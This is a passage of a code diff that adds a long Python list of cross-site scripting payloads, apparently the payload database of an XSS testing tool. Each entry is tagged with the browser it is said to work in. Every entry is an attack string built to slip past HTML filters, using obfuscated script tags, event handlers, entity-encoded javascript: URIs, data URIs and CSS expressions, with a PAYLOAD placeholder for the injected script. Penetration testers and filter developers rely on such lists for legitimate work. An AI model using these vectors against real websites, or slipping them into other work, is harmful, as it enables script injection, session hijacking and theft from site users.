+		  'browser':"""[Not Info]"""},
+		{ 'payload':'''<script>if(document.createElement("td").cellIndex == 0){PAYLOAD}</script>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v == -1){PAYLOAD}</script>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v> 1){PAYLOAD}</script>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v== undefined){PAYLOAD}</script>''',
+		  'browser':"""[IE]"""},
+		{ 'payload':'''<div/style="width:expression(confirm(PAYLOAD))">X</div>''',
+		  'browser':"""[IE7.0]"""},
+		{ 'payload':"""<sVg><scRipt %00>alert&lpar;PAYLOAD&rpar;""",
+		  'browser':"""[Opera]"""},
+        { 'payload':"""<svg><script x:href='PAYLOAD'""",
+          'browser':"""[Opera]"""},
+        { 'payload':"""&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(PAYLOAD)>OnMouseOver""",
+          'browser':"""[Opera|FF2.0]"""},
+        { 'payload':"""<svg><script psy> alert(PAYLOAD)""",
+          'browser':"""[Opera]"""},
+        { 'payload':"""<iframe %00 src="&Tab;javascript:prompt(PAYLOAD)&Tab;"%00>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<svg><style>{font-family&colon;'<iframe/onload=confirm(PAYLOAD)>'""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<input/onmouseover="javaSCRIPT&colon;confirm&lpar;PAYLOAD&rpar;"''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img/src='%00' onerror=this.onerror=confirm(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<form><isindex formaction="javascript&colon;confirm(PAYLOAD)"''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img src='%00'&NewLine; onerror=alert(PAYLOAD)&NewLine;""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script/&Tab; src='PAYLOAD' /&Tab;></script>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<ScRipT 5-0*3+9/3=>prompt(PAYLOAD)</ScRipT giveanswerhere=?""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script /*%00*/>/*%00*/alert(PAYLOAD)/*%00*/</script /*%00*/""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""&#34;&#62;<h1/onmouseover='\u0061lert(PAYLOAD)'>%00""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=alert(PAYLOAD)>">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(PAYLOAD)" http-equiv="refresh"/>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<svg><script xlink:href=data&colon;,window.open('PAYLOAD')></script""",
+          'browser':"""[Chrome] [FF]"""},
+        { 'payload':'''<meta http-equiv="refresh" content="0;url=javascript:confirm(PAYLOAD)">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img/&#09;&#10;&#11; src='~' onerror=prompt(PAYLOAD)>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(PAYLOAD)"&#11;&#10;&#09;;>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""http://www.google<script .com>alert(PAYLOAD)</script""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script ^__^>alert(PAYLOAD)</script ^__^""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""</style &#32;><script &#32; :-(>/**/alert(PAYLOAD)/**/</script &#32; :-(""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''&#00;</form><input type&#61;"date" onfocus="alert(PAYLOAD)">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<form><textarea &#13; onkeyup='PAYLOAD'>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script /***/>/***/confirm('PAYLOAD')/***/</script /***/""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<iframe srcdoc='&lt;body onload=prompt&lpar;PAYLOAD&rpar;&gt;'>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(PAYLOAD)&NewLine;>X</a>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script ~~~>alert(PAYLOAD)</script ~~~>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;PAYLOAD&rpar;>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<///style///><span %2F onmousemove='alert&lpar;PAYLOAD&rpar;'>SPAN""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img/src='http://i.imgur.com/removed.png' onmouseover=&Tab;prompt(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(PAYLOAD)>'""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<marquee onstart='javascript:alert&#x28;PAYLOAD&#x29;'>^__^""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<iframe/%00/ src=javaSCRIPT&colon;alert(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(PAYLOAD) /*iframe/src*/>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""//|\\ <script //|\\ src='PAYLOAD'> //|\\ </script //|\\""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(PAYLOAD)>'</font>/</style>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<a/href="javascript:&#13; javascript:prompt(PAYLOAD)"><input type="X">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""</plaintext\></|\><plaintext/onmouseover=prompt(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<div onmouseover='alert&lpar;PAYLOAD&rpar;'>DIV</div>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<a href="jAvAsCrIpT&colon;alert&lpar;PAYLOAD&rpar;">X</a>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<embed src="PAYLOAD">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<object data="PAYLOAD">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<var onmouseover="prompt(PAYLOAD)">On Mouse Over</var>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<img src="/" =_=" title="onerror="prompt(PAYLOAD)"">''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<%<!--'%><script>alert(PAYLOAD);</script -->""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<iframe/src \/\/onload = prompt(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<iframe/onreadystatechange=alert(PAYLOAD)""",
+          'browser':"""[Chrome] [IE]"""},
+        { 'payload':"""<svg/onload=alert(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<input value=<><iframe/src=javascript:confirm(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<input type='text' value='' <div/onmouseover='alert(PAYLOAD)'>X</div>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""http://www.<script>alert(PAYLOAD)</script .com""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<svg><script ?>alert(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img src='xx:xx'onerror=alert(PAYLOAD)>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<object type="text/x-scriptlet" data="PAYLOAD "></object>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;alert(PAYLOAD)"/>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<math><a xlink:href="PAYLOAD">click''',
+          'browser':"""[Chrome] [FF]"""},
+        { 'payload':'''<embed code="PAYLOAD" allowscriptaccess=always>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<svg contentScriptType=text/vbs><script>MsgBox+PAYLOAD""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('PAYLOAD')>""",
+          'browser':"""[Chrome] [IE]"""},
+        { 'payload':'''<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert("PAYLOAD")"></script a=\u0061 & /=%2F''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/PAYLOAD/)></script""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<object data=javascript&colon;\u0061&#x6C;&#101%72t(PAYLOAD)>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script>+-+-1-+-+alert(PAYLOAD)</script>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<body/onload=&lt;!--&gt;&#10alert(PAYLOAD)>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<img src ?psy?\/onerror = alert(PAYLOAD)""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<svg><script>//&NewLine;confirm(PAYLOAD);</script </svg>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(PAYLOAD)>ClickMe""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script x> alert(PAYLOAD) </script 1=2""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<div/onmouseover='alert(PAYLOAD)'> style='x:'>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<--'<img/src=' onerror=alert(PAYLOAD)> --!>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(PAYLOAD)></script>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>''',
+          'browser':"""[Chrome]"""},
+        { 'payload':"""'><img src=x onerror=window.open('PAYLOAD');>""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<form><button formaction=javascript&colon;alert(PAYLOAD)>CLICKME""",
+          'browser':"""[Chrome]"""},
+        { 'payload':"""<form id="test" /><button form="test" formaction="javascript:PAYLOAD">X""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<input onfocus=javascript:PAYLOAD autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<select onfocus=javascript:PAYLOAD autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<textarea onfocus=javascript:PAYLOAD autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<keygen onfocus=javascript:PAYLOAD autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<input onblur=javascript:PAYLOAD autofocus><input autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""<body onscroll=PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""X<form id=test onforminput=javascript:PAYLOAD><input></form>""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':"""X<form id=test><input></form><button form=test onformchange==javascript:PAYLOAD>X""",
+          'browser':"""[HTML5 Injection]"""},
+        { 'payload':'''<img src=1 href=1 onerror="javascript:PAYLOAD"></img>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<audio src=1 href=1 onerror="javascript:PAYLOAD"></audio>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<video src=1 href=1 onerror="javascript:PAYLOAD"></video>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body src=1 href=1 onerror="javascript:PAYLOAD"></body>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<image src=1 href=1 onerror="javascript:PAYLOAD"></image>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object src=1 href=1 onerror="javascript:PAYLOAD"></object>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script src=1 href=1 onerror="javascript:PAYLOAD"></script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg onResize svg onResize="javascript:javascript:PAYLOAD"></svg onResize>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<title onPropertyChange title onPropertyChange="javascript:javascript:PAYLOAD"></title onPropertyChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onLoad iframe onLoad="javascript:javascript:PAYLOAD"></iframe onLoad>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseEnter body onMouseEnter="javascript:javascript:PAYLOAD"></body onMouseEnter>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onFocus body onFocus="javascript:javascript:PAYLOAD"></body onFocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onScroll frameset onScroll="javascript:javascript:PAYLOAD"></frameset onScroll>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:javascript:PAYLOAD"></script onReadyStateChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseUp html onMouseUp="javascript:javascript:PAYLOAD"></html onMouseUp>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPropertyChange body onPropertyChange="javascript:javascript:PAYLOAD"></body onPropertyChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg onLoad svg onLoad="javascript:javascript:PAYLOAD"></svg onLoad>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPageHide body onPageHide="javascript:javascript:PAYLOAD"></body onPageHide>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseOver body onMouseOver="javascript:javascript:PAYLOAD"></body onMouseOver>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onUnload body onUnload="javascript:javascript:PAYLOAD"></body onUnload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onLoad body onLoad="javascript:javascript:PAYLOAD"></body onLoad>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:PAYLOAD"></bgsound onPropertyChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseLeave html onMouseLeave="javascript:javascript:PAYLOAD"></html onMouseLeave>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseWheel html onMouseWheel="javascript:javascript:PAYLOAD"></html onMouseWheel>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<style onLoad style onLoad="javascript:javascript:PAYLOAD"></style onLoad>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:PAYLOAD"></iframe onReadyStateChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPageShow body onPageShow="javascript:javascript:PAYLOAD"></body onPageShow>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:javascript:PAYLOAD"></style onReadyStateChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onFocus frameset onFocus="javascript:javascript:PAYLOAD"></frameset onFocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onError applet onError="javascript:javascript:PAYLOAD"></applet onError>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onStart marquee onStart="javascript:javascript:PAYLOAD"></marquee onStart>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script onLoad script onLoad="javascript:javascript:PAYLOAD"></script onLoad>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseOver html onMouseOver="javascript:javascript:PAYLOAD"></html onMouseOver>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseEnter html onMouseEnter="javascript:parent.javascript:PAYLOAD"></html onMouseEnter>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onBeforeUnload body onBeforeUnload="javascript:javascript:PAYLOAD"></body onBeforeUnload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseDown html onMouseDown="javascript:javascript:PAYLOAD"></html onMouseDown>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onScroll marquee onScroll="javascript:javascript:PAYLOAD"></marquee onScroll>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<xml onPropertyChange xml onPropertyChange="javascript:javascript:PAYLOAD"></xml onPropertyChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onBlur frameset onBlur="javascript:javascript:PAYLOAD"></frameset onBlur>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:PAYLOAD"></applet onReadyStateChange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg onUnload svg onUnload="javascript:javascript:PAYLOAD"></svg onUnload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseOut html onMouseOut="javascript:javascript:PAYLOAD"></html onMouseOut>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onMouseMove body onMouseMove="javascript:javascript:PAYLOAD"></body onMouseMove>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onResize body onResize="javascript:javascript:PAYLOAD"></body onResize>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object onError object onError="javascript:javascript:PAYLOAD"></object onError>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onPopState body onPopState="javascript:javascript:PAYLOAD"></body onPopState>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onMouseMove html onMouseMove="javascript:javascript:PAYLOAD"></html onMouseMove>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onreadystatechange applet onreadystatechange="javascript:javascript:PAYLOAD"></applet onreadystatechange>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onpagehide body onpagehide="javascript:javascript:PAYLOAD"></body onpagehide>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg onunload svg onunload="javascript:javascript:PAYLOAD"></svg onunload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<applet onerror applet onerror="javascript:javascript:PAYLOAD"></applet onerror>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onkeyup body onkeyup="javascript:javascript:PAYLOAD"></body onkeyup>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onunload body onunload="javascript:javascript:PAYLOAD"></body onunload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onload iframe onload="javascript:javascript:PAYLOAD"></iframe onload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onload body onload="javascript:javascript:PAYLOAD"></body onload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onmouseover html onmouseover="javascript:javascript:PAYLOAD"></html onmouseover>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object onbeforeload object onbeforeload="javascript:javascript:PAYLOAD"></object onbeforeload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onbeforeunload body onbeforeunload="javascript:javascript:PAYLOAD"></body onbeforeunload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onfocus body onfocus="javascript:javascript:PAYLOAD"></body onfocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onkeydown body onkeydown="javascript:javascript:PAYLOAD"></body onkeydown>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe onbeforeload iframe onbeforeload="javascript:javascript:PAYLOAD"></iframe onbeforeload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe src iframe src="javascript:javascript:PAYLOAD"></iframe src>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<svg onload svg onload="javascript:javascript:PAYLOAD"></svg onload>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<html onmousemove html onmousemove="javascript:javascript:PAYLOAD"></html onmousemove>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onblur body onblur="javascript:javascript:PAYLOAD"></body onblur>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''--><!-- ---> <img src=xxx:x onerror=javascript:PAYLOAD> -->''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>-javascript:PAYLOAD</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body onscroll=javascript:PAYLOAD><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<form id=test onforminput=javascript:PAYLOAD><input></form><button form=test onformchange=javascript:PAYLOAD>X''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''<video><source onerror="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[HTML5 Injection]"""},
+        { 'payload':'''<form><button formaction="javascript:javascript:PAYLOAD">X''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<body oninput=javascript:PAYLOAD><input autofocus>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<math href="javascript:javascript:PAYLOAD">X</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:PAYLOAD">X</maction> </math>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<frameset onload=javascript:PAYLOAD>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<table background="javascript:javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<!--<img src="--><img src=x onerror=javascript:PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<comment><img src="</comment><img src=x onerror=javascript:PAYLOAD)//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<![><img src="]><img src=x onerror=javascript:PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<style><img src="</style><img src=x onerror=javascript:PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<li style=list-style:url() onerror=javascript:PAYLOAD> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:PAYLOAD></div>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<head><base href="javascript://"></head><body><a href="/. /,javascript:PAYLOAD//#">X</a></body>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT FOR=document EVENT=onreadystatechange>javascript:PAYLOAD</SCRIPT>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:PAYLOAD"></OBJECT>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<b <script>PAYLOAD</script>0''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div id="div1"><input value="``onmouseover=javascript:PAYLOAD"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<x '="foo"><x foo='><img src=x onerror=javascript:PAYLOAD//'>''',
+	      'browser':"""[Not Info]"""},
+        { 'payload':'''<embed src="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<image src="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script src="javascript:PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div style=width:1px;filter:glow onfilterchange=javascript:PAYLOAD>x''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><script>javascript:PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<! foo="><script>javascript:PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''</ foo="><script>javascript:PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<? foo="><x foo='?><script>javascript:PAYLOAD</script>'>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<! foo="[[[Inception]]"><x foo="]foo><script>javascript:PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<% foo><x foo="%><script>javascript:PAYLOAD</script>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div id=d><x xmlns="><iframe onload=javascript:PAYLOAD"></div> <script>d.innerHTML=d.innerHTML</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img[a][b][c]src[d]=x[e]onerror=[f]"PAYLOAD">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:PAYLOAD>XXX</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src="x` `<script>javascript:PAYLOAD</script>"` `>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<img src onerror /" '"= alt=javascript:PAYLOAD//">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<title onpropertychange=javascript:PAYLOAD></title><title title=>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:PAYLOAD></a>">''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if]><script>javascript:PAYLOAD</script -->''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if<img src=x onerror=javascript:PAYLOAD//]> -->''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="-o-link:'javascript:javascript:PAYLOAD';-o-link-source:current">X''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<style>p[foo=bar{}*{-o-link:'javascript:javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>''',
+    	  'browser':"""[Not Info]"""},
+        { 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(javascript:PAYLOAD)%7d''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<style>@import "data:,*%7bx:expression(javascript:PAYLOAD)%7D";</style>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:PAYLOAD;">X</a></a><a href="javascript:javascript:PAYLOAD">X</a>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<div style="list-style:url(http://foo.f)\20url(javascript:javascript:PAYLOAD);">X''',
+    	  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>({set/**/$($){_/**/setter=$,_=javascript:PAYLOAD}}).$=eval</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>({0:#0=eval/#0#/#0#(javascript:PAYLOAD)})</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:PAYLOAD}),x</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:PAYLOAD')()</script>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`javascript:PAYLOAD` >''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:PAYLOAD&gt;`>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:PAYLOAD&gt;>''',
+		  'browser':"""[Not Info]"""},
+        { 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
